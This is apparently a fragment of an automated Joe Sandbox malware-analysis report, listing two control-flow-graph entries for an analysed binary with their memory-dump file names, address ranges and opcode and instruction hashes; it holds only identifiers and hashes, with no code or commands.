                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 136 401d98-401dd7 call 4018ef
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                  • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                  • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                  • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 127 401c98-401cd7 call 4018ef
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1693028021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1693008953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000000E03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1693088188.0000000001803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695629034.00000000021B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1695695469.00000000021BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9d2h99wrj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                  • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
                                                  • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                  • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54